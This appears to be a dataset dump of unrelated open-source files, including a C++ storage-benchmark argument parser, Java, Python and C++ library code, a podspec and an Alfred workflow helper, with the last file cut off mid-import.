true; } break; case 'h': if (t == TargetCacheMode::Undefined && w == WriteThroughMode::Undefined && m == MemoryMappedIoMode::Undefined) { t = TargetCacheMode::DisableOSCache; w = WriteThroughMode::On; } else { fprintf(stderr, "ERROR: -Sh conflicts with earlier specification of cache/writethrough/memory mapped\n"); fError = true; } break; case 'm': if (m == MemoryMappedIoMode::Undefined && t != TargetCacheMode::DisableOSCache) { m = MemoryMappedIoMode::On; } else { fprintf(stderr, "ERROR: -Sm conflicts with earlier specification of memory mapped IO/unbuffered IO\n"); fError = true; } break; case 'r': if (t == TargetCacheMode::Undefined) { t = TargetCacheMode::DisableLocalCache; } else { fprintf(stderr, "ERROR: -Sr conflicts with earlier specification of cache mode\n"); fError = true; } break; case 'u': if (t == TargetCacheMode::Undefined && m == MemoryMappedIoMode::Undefined) { t = TargetCacheMode::DisableOSCache; } else { fprintf(stderr, "ERROR: -Su conflicts with earlier specification of cache mode/memory mapped IO\n"); fError = true; } break; case 'w': if (w == WriteThroughMode::Undefined) { w = WriteThroughMode::On; } else { fprintf(stderr, "ERROR -Sw conflicts with earlier specification of write through\n"); fError = true; } break; default: fprintf(stderr, "ERROR: unrecognized option provided to -S\n"); fError = true; break; } } // bare -S, parse loop did not advance if (!fError && idx == 1) { if (t == TargetCacheMode::Undefined && m == MemoryMappedIoMode::Undefined) { t = TargetCacheMode::DisableOSCache; } else { fprintf(stderr, "ERROR: -S conflicts with earlier specification of cache mode\n"); fError = true; } } } break; case 't': //number of threads per file { int c = atoi(arg + 1); if (c > 0) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetThreadsPerFile(c); } } else { fError = true; } } break; case 'T': //offsets between threads reading the same file { UINT64 cb; if (_GetSizeInBytes(arg + 1, cb, nullptr) && (cb > 0)) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetThreadStrideInBytes(cb); } } else { fprintf(stderr, "ERROR: invalid offset passed to -T\n"); fError = true; } } break; case 'v': //verbose mode - handled in pass 1 break; case 'w': //write test [default=read] { int c = 0; if (*(arg + 1) == '\0') { fprintf(stderr, "ERROR: no write ratio passed to -w\n"); fError = true; } else { c = atoi(arg + 1); if (c < 0 || c > 100) { fprintf(stderr, "ERROR: write ratio passed to -w must be between 0 and 100 (percent)\n"); fError = true; } } if (!fError) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetWriteRatio(c); } } } break; case 'W': //warm up time - pass 1 composable break; case 'x': //completion routines timeSpan.SetCompletionRoutines(true); break; case 'y': //external synchronization switch (*(arg + 1)) { case 's': _hEventStarted = CreateEvent(NULL, TRUE, FALSE, arg + 2); if (NULL == _hEventStarted) { fprintf(stderr, "Error creating/opening start notification event: '%s'\n", arg + 2); exit(1); // TODO: this class shouldn't terminate the process } break; case 'f': _hEventFinished = CreateEvent(NULL, TRUE, FALSE, arg + 2); if (NULL == _hEventFinished) { fprintf(stderr, "Error creating/opening finish notification event: '%s'\n", arg + 2); exit(1); // TODO: this class shouldn't terminate the process } break; case 'r': synch->hStartEvent = CreateEvent(NULL, TRUE, FALSE, arg + 2); if (NULL == synch->hStartEvent) { fprintf(stderr, "Error creating/opening wait-for-start event: '%s'\n", arg + 2); exit(1); // TODO: this class shouldn't terminate the process } break; case 'p': synch->hStopEvent = CreateEvent(NULL, TRUE, FALSE, arg + 2); if (NULL == synch->hStopEvent) { fprintf(stderr, "Error creating/opening force-stop event: '%s'\n", arg + 2); exit(1); // TODO: this class shouldn't terminate the process } break; case 'e': { HANDLE hEvent = OpenEvent(EVENT_MODIFY_STATE, FALSE, arg + 2); if (NULL == hEvent) { fprintf(stderr, "Error opening event '%s'\n", arg + 2); exit(1); // TODO: this class shouldn't terminate the process } if (!SetEvent(hEvent)) { fprintf(stderr, "Error setting event '%s'\n", arg + 2); exit(1); // TODO: this class shouldn't terminate the process } CloseHandle(hEvent); printf("Succesfully set event: '%s'\n", arg + 2); bExit = true; break; } default: fError = true; } case 'z': //random seed - pass 1 composable break; case 'Z': //zero write buffers if (*(arg + 1) == '\0') { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetZeroWriteBuffers(true); } } else if (*(arg + 1) == 'r' && *(arg + 2) == '\0') { timeSpan.SetRandomWriteData(true); } else { UINT64 cb = 0; string sPath; if (_GetRandomDataWriteBufferData(string(arg + 1), cb, sPath) && (cb > 0)) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetRandomDataWriteBufferSize(cb); i->SetRandomDataWriteBufferSourcePath(sPath); } } else { fprintf(stderr, "ERROR: invalid size passed to -Z\n"); fError = true; } } break; default: fprintf(stderr, "ERROR: invalid option: '%s'\n", carg); return false; } if (fError) { // note: original pointer to the cmdline argument, without parse movement fprintf(stderr, "ERROR: incorrectly provided option: '%s'\n", carg); return false; } --nParamCnt; ++args; } // // exit if a user specified an action which was already satisfied and doesn't require running test // if (bExit) { printf("Now exiting...\n"); exit(1); // TODO: this class shouldn't terminate the process } if (vTargets.size() < 1) { fprintf(stderr, "ERROR: need to provide at least one filename\n"); return false; } // apply resultant cache/writethrough/memory mapped io modes to the targets for (auto i = vTargets.begin(); i != vTargets.end(); i++) { if (t != TargetCacheMode::Undefined) { i->SetCacheMode(t); } if (w != WriteThroughMode::Undefined) { i->SetWriteThroughMode(w); } if (m != MemoryMappedIoMode::Undefined) { i->SetMemoryMappedIoMode(m); } if (f != MemoryMappedIoFlushMode::Undefined) { i->SetMemoryMappedIoFlushMode(f); } } // ... and apply targets to the timespan for (auto i = vTargets.begin(); i != vTargets.end(); i++) { timeSpan.AddTarget(*i); } pProfile->AddTimeSpan(timeSpan); return true; } bool CmdLineParser::_ReadParametersFromXmlFile(const char *pszPath, Profile *pProfile, vector<Target> *pvSubstTargets) { XmlProfileParser parser; return parser.ParseFile(pszPath, pProfile, pvSubstTargets, NULL); } bool CmdLineParser::ParseCmdLine(const int argc, const char *argv[], Profile *pProfile, struct Synchronization *synch, SystemInformation *pSystem) { assert(nullptr != argv); assert(nullptr != pProfile); assert(NULL != synch); if (argc < 2) { _DisplayUsageInfo(argv[0]); return false; } string sCmdLine; for (int i = 0; i < argc - 1; i++) { sCmdLine += argv[i]; sCmdLine += ' '; } if (argc > 0) { sCmdLine += argv[argc - 1]; } pProfile->SetCmdLine(sCmdLine); bool fOk = true; bool fXMLProfile = false; fOk = _ReadParametersFromCmdLine(argc, argv, pProfile, synch, fXMLProfile); // Check additional restrictions and conditions on the parsed profile. // Note that on the current cmdline, all targets receive the same parameters // so their mutual consistency only needs to be checked once. Do not check // system consistency in profile-only operation (this is only required at // execution time). if (fOk) { fOk = pProfile->Validate(!fXMLProfile, pProfile->GetProfileOnly() ? nullptr : pSystem); } return fOk; }
41,007
310
<reponame>dreeves/usesthis<filename>gear/software/w/wave.2.json { "name": "Wave", "description": "An accounting and invoicing service.", "url": "https://www.waveapps.com/" }
67
357
/* * * Copyright (c) 2012-2015 VMware, Inc. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy * of the License at http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, without * warranties or conditions of any kind, EITHER EXPRESS OR IMPLIED. See the * License for the specific language governing permissions and limitations * under the License. * */ package com.vmware.identity.idm.server; import java.util.Arrays; import java.util.List; import com.sun.jna.Pointer; import com.vmware.identity.interop.ossam.BaseOsSamNativeStructure; public class LocalGroupInfo1 extends BaseOsSamNativeStructure { static final int Level = 1; //typedef struct _LOCALGROUP_INFO_1 { // LPWSTR lgrpi1_name; // LPWSTR lgrpi1_comment; //} LOCALGROUP_INFO_1, *PLOCALGROUP_INFO_1, *LPLOCALGROUP_INFO_1; public String name; public String comment; public LocalGroupInfo1() { super(); } public LocalGroupInfo1(Pointer p) { super(p); } @Override protected List<String> getFieldOrder() { return Arrays.asList(new String[] { "name", "comment" }); } }
521
389
import cv2 import os from math import sin, cos, radians import ctypes import time import pygame def pos(gameDisplay,ge,x,y): gameDisplay.blit(ge,(x,y)) def blush(gameDisplay,kb): x = (scl-ix)/2 y = scb-iy gameDisplay.blit(kb,(x,y)) pygame.display.update() def eyeloc(gameDisplay,eye,ex,ey): gameDisplay.blit(eye,(ex,ey)) def move_eyes(gameDisplay, xcord, ycord,): w = scl h = scb x = (w-ix)/2 y = h-iy ex = (w-ix)/2 ey = h-iy nx = ex+ xcord/20 -10 ny = ey + ycord/20 -10 gameDisplay.blit(eye,(nx,ny)) gameDisplay.blit(ge,(x,y)) #code to redraw images pygame.display.update() def show_yuri_image(w, h): w = scl h = scb os.environ['SDL_VIDEO_WINDOW_POS'] = "0,0" gameDisplay = pygame.display.set_mode((w,h)) print(gameDisplay) pygame.display.set_caption("YURI BLUSH") x = (w-ix)/2 y = h-iy ex = (w-ix)/2 ey = h-iy gameDisplay.fill(black) #eyeloc(gameDisplay, eye, ex, ey) #pos(gameDisplay, ge, x, y) pygame.display.update() return gameDisplay def rotate_image(image, angle): if angle == 0: return image height, width = image.shape[:2] rot_mat = cv2.getRotationMatrix2D((width/2, height/2), angle, 0.9) result = cv2.warpAffine(image, rot_mat, (width, height), flags=cv2.INTER_LINEAR) return result def rotate_point(pos, img, angle): if angle == 0: return pos x = pos[0] - img.shape[1]*0.4 y = pos[1] - img.shape[0]*0.4 newx = x*cos(radians(angle)) + y*sin(radians(angle)) + img.shape[1]*0.4 newy = -x*sin(radians(angle)) + y*cos(radians(angle)) + img.shape[0]*0.4 return int(newx), int(newy), pos[2], pos[3] if __name__=='__main__': pygame.init() black = (255,255,255) ix = 960 iy = 960 assets = os.path.join('assets') ge = pygame.image.load(os.path.join(assets,'yuri_cute.png')) eye = pygame.image.load(os.path.join(assets,'yuri_eyes.png')) kb = pygame.image.load(os.path.join(assets,'yuri_blush.png')) # user32 = ctypes.windll.user32 # scl,scb = user32.GetSystemMetrics(0), user32.GetSystemMetrics(1) scl,scb = 1920, 1080 print("Width: ",scl,"Height: ",scb) #screen metrics camera = cv2.VideoCapture(0) w = camera.set(3, scl/2) h = camera.set(4, scb/2) face = cv2.CascadeClassifier(os.path.join("face_detector","haarcascade_frontalface_alt2.xml")) fps = camera.get(cv2.CAP_PROP_FPS) print("fps: ",fps) settings = { 'scaleFactor': 1.3, 'minNeighbors': 3, 'minSize': (50, 50), } gameDisplay = show_yuri_image(scl, scb) running = True while running: event = pygame.event.get() if(event is not None): pressed = pygame.key.get_pressed() if(pressed[pygame.K_q]): running = False ret, imgn = camera.read() img = cv2.flip(imgn, +1) for angle in [0, -25, 25]: rimg = rotate_image(img, angle) detected = face.detectMultiScale(rimg, **settings) if len(detected): detected = [rotate_point(detected[-1], img, -angle)] break # Make a copy as we don't want to draw on the original image: for x, y, w, h in detected[-1:]: cv2.rectangle(img, (x, y), (x+w, y+h), (255,0,0), 2) xcord = (x+w)/2 ycord = 2*(y+h)/3 # to look at the eyes # put in else move_eyes(gameDisplay, xcord, ycord,) if x+w >400 and y+h >400: print("too close") blush(gameDisplay,kb) else: move_eyes(gameDisplay, xcord, ycord,) #cv2.imshow('facedetect', img) if cv2.waitKey(5) != -1: break cv2.destroyAllWindows() pygame.quit() quit()
2,069
3,227
<gh_stars>1000+ // Copyright (c) 2000 Max-Planck-Institute Saarbruecken (Germany). // All rights reserved. // // This file is part of CGAL (www.cgal.org). // // $URL$ // $Id$ // SPDX-License-Identifier: GPL-3.0-or-later OR LicenseRef-Commercial // // // Author(s) : <NAME> <<EMAIL>> #ifndef CGAL_PARTITION_OPT_CVX_EDGE_H #define CGAL_PARTITION_OPT_CVX_EDGE_H #include <CGAL/license/Partition_2.h> #include <iostream> #include <CGAL/Partition_2/Partition_opt_cvx_diagonal_list.h> namespace CGAL { enum Partition_opt_cvx_edge_validity {PARTITION_OPT_CVX_NOT_VALID, PARTITION_OPT_CVX_START_VALID, PARTITION_OPT_CVX_END_VALID, PARTITION_OPT_CVX_BOTH_VALID}; class Partition_opt_cvx_edge { public: Partition_opt_cvx_edge(): _is_done(false), _validity(PARTITION_OPT_CVX_NOT_VALID), _is_visible(false), _value(0) {} bool is_done( ) const { return _is_done; } bool is_valid( ) const { return _validity != PARTITION_OPT_CVX_NOT_VALID; } Partition_opt_cvx_edge_validity validity( ) const { return _validity; } bool is_visible( ) const { return _is_visible; } int value( ) const { return _value; } Partition_opt_cvx_diagonal_list solution( ) const { return _solution; } void set_done(bool val) { _is_done = val; } void set_valid(Partition_opt_cvx_edge_validity val) { _validity = val; } template <class Point_2_, class Traits> void set_valid(const Point_2_& p1, const Point_2_& p2, const Point_2_& p3, const Point_2_& p4, const Point_2_& p5, const Point_2_& p6, const Traits& traits) { typedef typename Traits::Left_turn_2 Left_turn_2; Left_turn_2 left_turn = traits.left_turn_2_object(); _validity = PARTITION_OPT_CVX_NOT_VALID; Turn_reverser<typename Traits::Point_2, Left_turn_2> right_turn(left_turn); if (right_turn(p1, p2, p3)) _validity = PARTITION_OPT_CVX_START_VALID; if (right_turn(p4, p5, p6)) { if (_validity == PARTITION_OPT_CVX_START_VALID) _validity = PARTITION_OPT_CVX_BOTH_VALID; else _validity = PARTITION_OPT_CVX_END_VALID; } } void set_visible(bool vis) { _is_visible = vis; } void set_value(int val) { _value = val; } void set_solution(const Partition_opt_cvx_diagonal_list& diag_list) { _solution = diag_list; } private: bool _is_done; Partition_opt_cvx_edge_validity _validity; bool _is_visible; int _value; Partition_opt_cvx_diagonal_list _solution; }; inline std::ostream& operator<<(std::ostream& os, const Partition_opt_cvx_edge& g) { if (g.is_done()) os << "1"; else os << "0"; if (g.validity() == PARTITION_OPT_CVX_NOT_VALID) os << "0"; else if (g.validity() == PARTITION_OPT_CVX_START_VALID) os << "1"; else if (g.validity() == PARTITION_OPT_CVX_END_VALID) os << "2"; else os << "3"; if (g.is_visible()) os << "1"; else os << "0"; os << g.value(); return os; } } #endif // CGAL_PARTITION_OPT_CVX_EDGE_H
1,601
2,542
<filename>src/prod/src/data/txnreplicator/loggingreplicator/StateProvider.cpp // ------------------------------------------------------------ // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License (MIT). See License.txt in the repo root for license information. // ------------------------------------------------------------ #include "stdafx.h" using namespace Common; using namespace ktl; using namespace Data::LoggingReplicator; using namespace Data::LogRecordLib; using namespace Data::Utilities; using namespace TxnReplicator; using namespace TestHooks; StateProvider::StateProvider(__in LoggingReplicatorImpl & loggingReplicatorStateProvider) : IStateProvider() , KObject() , KShared() , PartitionedReplicaTraceComponent(*loggingReplicatorStateProvider.PartitionedReplicaIdentifier) , loggingReplicatorStateProvider_(&loggingReplicatorStateProvider) , testHookContext_() { EventSource::Events->Ctor( TracePartitionId, ReplicaId, L"StateProvider", reinterpret_cast<uintptr_t>(this)); } StateProvider::~StateProvider() { EventSource::Events->Dtor( TracePartitionId, ReplicaId, L"StateProvider", reinterpret_cast<uintptr_t>(this)); } IStateProvider::SPtr StateProvider::Create( __in LoggingReplicatorImpl & loggingReplicator, __in KAllocator & allocator) { StateProvider * pointer = _new(V1REPLICATOR_TAG, allocator) StateProvider(loggingReplicator); if (pointer == nullptr) { throw Exception(STATUS_INSUFFICIENT_RESOURCES); } return IStateProvider::SPtr(pointer); } void StateProvider::Dispose() { loggingReplicatorStateProvider_.Reset(); } Awaitable<NTSTATUS> StateProvider::OnDataLossAsync(__out bool & result) { NTSTATUS status = co_await loggingReplicatorStateProvider_->OnDataLossAsync(result); co_return status; } Awaitable<NTSTATUS> StateProvider::UpdateEpochAsync( __in FABRIC_EPOCH const * epoch, __in LONG64 lastLsnInPreviousEpoch) { Epoch e(epoch->DataLossNumber, epoch->ConfigurationNumber); NTSTATUS status = co_await loggingReplicatorStateProvider_->UpdateEpochAsync(e, lastLsnInPreviousEpoch); co_return status; } HRESULT StateProvider::GetCopyContext(__out IOperationDataStream::SPtr & copyContextStream) { HRESULT ret = S_OK; NTSTATUS status = loggingReplicatorStateProvider_->GetCopyContext(copyContextStream); ret = StatusConverter::ToHResult(status); return ret; } HRESULT StateProvider::GetCopyState( __in FABRIC_SEQUENCE_NUMBER uptoSequenceNumber, __in OperationDataStream & copyContextStream, __out IOperationDataStream::SPtr & copyStateStream) { HRESULT ret = this->Test_GetInjectedFault(FaultInjector::FabricTest_GetCopyStateTag); if (!SUCCEEDED(ret)) { return ret; } NTSTATUS status = loggingReplicatorStateProvider_->GetCopyState( uptoSequenceNumber, copyContextStream, copyStateStream); ret = StatusConverter::ToHResult(status); return ret; } HRESULT StateProvider::GetLastCommittedSequenceNumber(FABRIC_SEQUENCE_NUMBER * lsn) { HRESULT ret = S_OK; NTSTATUS status = loggingReplicatorStateProvider_->GetLastCommittedSequenceNumber(*lsn); ret = StatusConverter::ToHResult(status); return ret; } void StateProvider::Test_SetTestHookContext(TestHooks::TestHookContext const & testHookContext) { testHookContext_ = testHookContext; if (loggingReplicatorStateProvider_) { loggingReplicatorStateProvider_->Test_SetTestHookContext(testHookContext); } } HRESULT StateProvider::CreateAsyncOnDataLossContext(__out AsyncOnDataLossContext::SPtr & asyncContext) { AsyncOnDataLossContextImpl::SPtr context = _new(V1REPLICATOR_TAG, GetThisAllocator()) AsyncOnDataLossContextImpl(); if (!context) { return StatusConverter::ToHResult(STATUS_INSUFFICIENT_RESOURCES); } NTSTATUS status = context->Status(); if (!NT_SUCCESS(status)) { return StatusConverter::ToHResult(status); } context->parent_ = this; asyncContext.Attach(context.DownCast<AsyncOnDataLossContext>()); context.Detach(); return S_OK; } HRESULT StateProvider::CreateAsyncUpdateEpochContext(__out AsyncUpdateEpochContext::SPtr & asyncContext) { ApiSignalHelper::WaitForSignalIfSet(testHookContext_, StateProviderBeginUpdateEpochBlock); auto hr = this->Test_GetInjectedFault(FaultInjector::FabricTest_BeginUpdateEpochTag); if (!SUCCEEDED(hr)) { return hr; } AsyncUpdateEpochContextImpl::SPtr context = _new(V1REPLICATOR_TAG, GetThisAllocator()) AsyncUpdateEpochContextImpl(); if (!context) { return StatusConverter::ToHResult(STATUS_INSUFFICIENT_RESOURCES); } NTSTATUS status = context->Status(); if (!NT_SUCCESS(status)) { return StatusConverter::ToHResult(status); } context->parent_ = this; asyncContext.Attach(context.DownCast<AsyncUpdateEpochContext>()); context.Detach(); return S_OK; } HRESULT StateProvider::Test_GetInjectedFault(wstring const & tag) { ErrorCodeValue::Enum injectedFault; if (FaultInjector::GetGlobalFaultInjector().TryReadError( tag, testHookContext_, injectedFault)) { return ErrorCode(injectedFault).ToHResult(); } return S_OK; } // // OnDataLoss Operation // StateProvider::AsyncOnDataLossContextImpl::AsyncOnDataLossContextImpl() : isStateChanged_(FALSE) { } StateProvider::AsyncOnDataLossContextImpl::~AsyncOnDataLossContextImpl() { } HRESULT StateProvider::AsyncOnDataLossContextImpl::StartOnDataLoss( __in_opt KAsyncContextBase * const parentAsyncContext, __in_opt KAsyncContextBase::CompletionCallback callback) { Start(parentAsyncContext, callback); return S_OK; } void StateProvider::AsyncOnDataLossContextImpl::OnStart() { DoWork(); } Task StateProvider::AsyncOnDataLossContextImpl::DoWork() { KCoShared$ApiEntry(); NTSTATUS status = STATUS_SUCCESS; bool result = false; status = co_await parent_->OnDataLossAsync(result); if (NT_SUCCESS(status)) { isStateChanged_ = result ? TRUE : FALSE; } Complete(status); } HRESULT StateProvider::AsyncOnDataLossContextImpl::GetResult( __out BOOLEAN & isStateChanged) { isStateChanged = isStateChanged_; return Result(); } // // UpdateEpoch Operation // StateProvider::AsyncUpdateEpochContextImpl::AsyncUpdateEpochContextImpl() : previousEpochLastSequenceNumber_(Constants::InvalidLsn) { epoch_.ConfigurationNumber = 0; epoch_.DataLossNumber = 0; epoch_.Reserved = nullptr; } StateProvider::AsyncUpdateEpochContextImpl::~AsyncUpdateEpochContextImpl() { } HRESULT StateProvider::AsyncUpdateEpochContextImpl::StartUpdateEpoch( __in FABRIC_EPOCH const & epoch, __in FABRIC_SEQUENCE_NUMBER previousEpochLastSequenceNumber, __in_opt KAsyncContextBase * const parentAsyncContext, __in_opt KAsyncContextBase::CompletionCallback callback) { epoch_ = epoch; previousEpochLastSequenceNumber_ = previousEpochLastSequenceNumber; Start(parentAsyncContext, callback); return S_OK; } void StateProvider::AsyncUpdateEpochContextImpl::OnStart() { DoWork(); } Task StateProvider::AsyncUpdateEpochContextImpl::DoWork() { KCoShared$ApiEntry(); NTSTATUS status = STATUS_SUCCESS; auto hr = parent_->Test_GetInjectedFault(FaultInjector::FabricTest_EndUpdateEpochTag); if (!SUCCEEDED(hr)) { status = ErrorCode::FromHResult(hr).ToNTStatus(); Complete(status); co_return; } try { co_await parent_->UpdateEpochAsync(&epoch_, previousEpochLastSequenceNumber_); } catch (Exception e) { status = e.GetStatus(); } Complete(status); }
2,901
9,782
<reponame>willianfonseca/presto /* * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.facebook.presto.orc; import com.facebook.presto.orc.metadata.DwrfStripeCache; import java.util.Optional; public interface StripeMetadataSourceFactory { StripeMetadataSource create(Optional<DwrfStripeCache> dwrfStripeCache); /** * Creates a factory always returning the same instance of the StripeMetadataSource. */ static StripeMetadataSourceFactory of(StripeMetadataSource source) { return dwrfStripeCache -> source; } }
331
1,442
<reponame>VersiraSec/epsilon-cfw<gh_stars>1000+ #ifndef LIBA_IEEE754_H #define LIBA_IEEE754_H #include <stdint.h> uint32_t ieee754man32(float x); uint8_t ieee754exp32(float x); uint64_t ieee754man64(double x); uint16_t ieee754exp64(double x); #endif
119
5,133
<reponame>Saljack/mapstruct<gh_stars>1000+ /* * Copyright MapStruct Authors. * * Licensed under the Apache License version 2.0, available at http://www.apache.org/licenses/LICENSE-2.0 */ package org.mapstruct.ap.test.bugs._1596.dto; import java.util.ArrayList; import java.util.List; /** * Immutable implementation of {@link ItemDTO}. * <p> * Use the builder to create immutable instances: * {@code ImmutableItemDTO.builder()}. */ @SuppressWarnings({ "all" }) public final class ImmutableItemDTO extends ItemDTO { private final String id; private ImmutableItemDTO(String id) { this.id = id; } /** * @return The value of the {@code id} attribute */ @Override public String getId() { return id; } /** * Copy the current immutable object by setting a value for the {@link ItemDTO#getId() id} attribute. * A shallow reference equality check is used to prevent copying of the same value by returning {@code this}. * * @param value A new value for id * * @return A modified copy of the {@code this} object */ public final ImmutableItemDTO withId(String value) { if ( this.id == value ) { return this; } return new ImmutableItemDTO( value ); } /** * This instance is equal to all instances of {@code ImmutableItemDTO} that have equal attribute values. * * @return {@code true} if {@code this} is equal to {@code another} instance */ @Override public boolean equals(Object another) { if ( this == another ) { return true; } return another instanceof ImmutableItemDTO && equalTo( (ImmutableItemDTO) another ); } private boolean equalTo(ImmutableItemDTO another) { return id.equals( another.id ); } /** * Computes a hash code from attributes: {@code id}. * * @return hashCode value */ @Override public int hashCode() { int h = 5381; h += ( h << 5 ) + id.hashCode(); return h; } /** * Prints the immutable value {@code ItemDTO} with attribute values. * * @return A string representation of the value */ @Override public String toString() { return "ItemDTO{" + "id=" + id + "}"; } /** * Creates an immutable copy of a {@link ItemDTO} value. * Uses accessors to get values to initialize the new immutable instance. * If an instance is already immutable, it is returned as is. * * @param instance The instance to copy * * @return A copied immutable ItemDTO instance */ public static ImmutableItemDTO copyOf(ItemDTO instance) { if ( instance instanceof ImmutableItemDTO ) { return (ImmutableItemDTO) instance; } return ImmutableItemDTO.builder() .from( instance ) .build(); } /** * Creates a builder for {@link ImmutableItemDTO ImmutableItemDTO}. * * @return A new ImmutableItemDTO builder */ public static ImmutableItemDTO.Builder builder() { return new ImmutableItemDTO.Builder(); } /** * Builds instances of type {@link ImmutableItemDTO ImmutableItemDTO}. * Initialize attributes and then invoke the {@link #build()} method to create an * immutable instance. * <p><em>{@code Builder} is not thread-safe and generally should not be stored in a field or collection, * but instead used immediately to create instances.</em> */ public static final class Builder { private static final long INIT_BIT_ID = 0x1L; private long initBits = 0x1L; private String id; private Builder() { } /** * Fill a builder with attribute values from the provided {@code ItemDTO} instance. * Regular attribute values will be replaced with those from the given instance. * Absent optional values will not replace present values. * * @param instance The instance from which to copy values * * @return {@code this} builder for use in a chained invocation */ public final Builder from(ItemDTO instance) { id( instance.getId() ); return this; } /** * Initializes the value for the {@link ItemDTO#getId() id} attribute. * * @param id The value for id * * @return {@code this} builder for use in a chained invocation */ public final Builder id(String id) { this.id = id; initBits &= ~INIT_BIT_ID; return this; } /** * Builds a new {@link ImmutableItemDTO ImmutableItemDTO}. * * @return An immutable instance of ItemDTO * * @throws java.lang.IllegalStateException if any required attributes are missing */ public ImmutableItemDTO build() { if ( initBits != 0 ) { throw new IllegalStateException( formatRequiredAttributesMessage() ); } return new ImmutableItemDTO( id ); } private String formatRequiredAttributesMessage() { List<String> attributes = new ArrayList<String>(); if ( ( initBits & INIT_BIT_ID ) != 0 ) { attributes.add( "id" ); } return "Cannot build ItemDTO, some of required attributes are not set " + attributes; } } }
2,253
5,169
<reponame>Gantios/Specs { "name": "nativebridge-ios", "version": "0.1.1", "summary": "The native part of a communication bridge between javascript running in a WKWebView and your app.", "description": "When used together with its javascript counterpart, 'nativebridge', this framework enables communication between\nyour app and the javascript hosted in a WKWebView.", "homepage": "https://github.com/nrkno/nativebridge-ios", "license": { "type": "MIT", "file": "LICENSE" }, "authors": { "<NAME>": "<EMAIL>" }, "source": { "git": "https://github.com/nrkno/nativebridge-ios.git", "tag": "0.1.1" }, "module_name": "NativeBridge", "platforms": { "ios": "9.0" }, "source_files": "nativebridge-ios/Classes/**/*", "ios": { "frameworks": "WebKit" } }
297
2,177
<reponame>yagosys/AlfredWorkflow.com #!/usr/bin/python # coding=UTF-8 import plistlib import os.path preferences = plistlib.readPlist('info.plist') bundleid = preferences['bundleid'] cache_dir = os.path.expanduser('~/Library/Caches' '/com.runningwithcrayons.Alfred-2' '/Workflow Data/{}'.format(bundleid)) data_dir = os.path.expanduser('~/Library/Application Support/Alfred 2' '/Workflow Data/{}'.format(bundleid)) class Item(object): '''An item in an Alfred feedback XML message''' def __init__(self, uid, title, subtitle=None, icon=None, valid=False, arg=None): self.uid = uid self.title = title self.subtitle = subtitle self.valid = valid self.arg = arg self.icon = icon if icon is not None else 'icon.png' def to_xml(self): attrs = [] attrs.append('uid="{}-{}"'.format(bundleid, self.uid)) if self.valid: attrs.append('valid="yes"') else: attrs.append('valid="no"') if self.arg is not None: attrs.append(u'arg="{}"'.format(self.arg)) xml = [u'<item {}>'.format(u' '.join(attrs))] xml.append(u'<title>{}</title>'.format(self.title)) if self.subtitle is not None: xml.append(u'<subtitle>{}</subtitle>'.format(self.subtitle)) if self.icon is not None: xml.append(u'<icon>{}</icon>'.format(self.icon)) xml.append(u'</item>') return ''.join(xml) def to_xml(items): '''Convert a list of Items to an Alfred XML feedback message''' msg = [u'<?xml version="1.0"?>', u'<items>'] for item in items: msg.append(item.to_xml()) msg.append(u'</items>') return u''.join(msg) def get_from_user(title, prompt, hidden=False, value=None): ''' Popup a dialog to request some piece of information. The main use for this function is to request information that you don't want showing up in Alfred's command history. ''' if value is None: value = '' script = ''' on run argv tell application "Alfred 2" activate set alfredPath to (path to application "Alfred 2") set alfredIcon to path to resource "appicon.icns" in bundle ¬ (alfredPath as alias) set dlgTitle to (item 1 of argv) set dlgPrompt to (item 2 of argv) if (count of argv) is 3 set dlgHidden to (item 3 of argv as boolean) else set dlgHidden to false end if if dlgHidden display dialog dlgPrompt & ":" with title dlgTitle ¬ default answer "{v}" with icon alfredIcon with hidden answer else display dialog dlgPrompt & ":" with title dlgTitle ¬ default answer "{v}" with icon alfredIcon end if set answer to text returned of result end tell end run'''.format(v=value) from subprocess import Popen, PIPE cmd = ['osascript', '-', title, prompt] if hidden: cmd.append('true') p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE) stdout, stderr = p.communicate(script) return stdout.rstrip('\n') def show_message(title, message): '''Display a message dialog''' script = ''' on run argv tell application "Alfred 2" activate set alfredPath to (path to application "Alfred 2") set alfredIcon to path to resource "appicon.icns" in bundle ¬ (alfredPath as alias) set dlgTitle to (item 1 of argv) set dlgMessage to (item 2 of argv) display dialog dlgMessage with title dlgTitle buttons ¬ {"OK"} default button "OK" with icon alfredIcon end tell end run''' from subprocess import Popen, PIPE cmd = ['osascript', '-', title, message] p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE) p.communicate(script) if __name__ == '__main__': from sys import argv globals()[argv[1]](*argv[2:])
2,040
1,056
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.netbeans.modules.php.editor; import java.util.ArrayList; import java.util.Collection; import java.util.List; import org.netbeans.modules.csl.api.ElementHandle; import org.netbeans.modules.php.editor.api.QualifiedName; import org.netbeans.modules.php.editor.api.QualifiedNameKind; import org.netbeans.modules.php.editor.api.elements.FullyQualifiedElement; import org.netbeans.modules.php.editor.api.elements.TypeMemberElement; import org.netbeans.modules.php.editor.model.ModelElement; import org.netbeans.modules.php.editor.model.Scope; import org.netbeans.modules.php.editor.model.TypeScope; import 